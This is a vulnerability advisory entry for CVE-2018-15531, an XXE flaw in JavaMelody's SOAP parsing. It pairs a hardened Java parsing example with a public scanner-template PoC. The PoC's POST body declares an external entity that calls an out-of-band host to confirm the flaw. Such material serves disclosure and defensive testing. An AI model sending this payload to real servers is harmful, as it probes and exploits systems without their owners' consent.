CVE-2018-15531: JavaMelody XXE

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

JavaMelody before 1.74.0 has XXE via parseSoapMethodName in bull/javamelody/PayloadNameRequestWrapper.java.
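
For the mitigation side of the description above, this added example (not JavaMelody's own code) shows a StAX parser that reads a SOAP method name with DTD processing and external entity resolution switched off, and that rejects any document carrying a DOCTYPE. The class name `SafeSoapMethodName`, the `parse` helper and both sample messages are constructed for illustration.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Added example (hypothetical class, not JavaMelody's code): SOAP body parsing with DTDs refused.
public class SafeSoapMethodName {
    // Returns the local name of the first element inside <Body>, or null if there is none.
    static String parse(String xml) throws XMLStreamException {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        // Do not process DTDs and never resolve external entities.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
        try {
            boolean inBody = false;
            while (reader.hasNext()) {
                int event = reader.next();
                if (event == XMLStreamConstants.DTD) {
                    // A SOAP message has no reason to carry a DOCTYPE: reject it outright.
                    throw new XMLStreamException("DOCTYPE not allowed in SOAP payload");
                }
                if (event == XMLStreamConstants.START_ELEMENT) {
                    if (inBody) return reader.getLocalName();
                    inBody = "Body".equals(reader.getLocalName());
                }
            }
            return null;
        } finally {
            reader.close();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs; the .invalid host never resolves.
        String benign = "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">"
            + "<soap:Body><getOrder/></soap:Body></soap:Envelope>";
        String hostile = "<?xml version=\"1.0\"?><!DOCTYPE root ["
            + "<!ENTITY % remote SYSTEM \"http://oob.example.invalid/\"> %remote; ]><root/>";
        System.out.println("benign method: " + parse(benign));
        try {
            System.out.println("hostile parsed as: " + parse(hostile));
        } catch (XMLStreamException e) {
            System.out.println("hostile rejected: " + e.getMessage());
        }
    }
}
```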

PoC code [public]

id: CVE-2018-15531

info:
  name: JavaMelody XXE
  author: Lay0us1
  severity: high
  verified: false
  description: |-
    JavaMelody before 1.74.0 has XXE via parseSoapMethodName in bull/javamelody/PayloadNameRequestWrapper.java.
  reference:
    - https://imagemlt.github.io/post/melodyXXE/index.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-15531
  tags: cve,cve2018,xxe,javamelody
  created: 2024/02/25

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /
      headers:
        Content-Type: text/xml
        SOAPAction: aaaaa
      body: |
        <?xml version="1.0" encoding="UTF-8" standalone="no" ?>
        <!DOCTYPE root [
        <!ENTITY % remote SYSTEM "{{oobHTTP}}">
        %remote;
        ]>
        </root>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()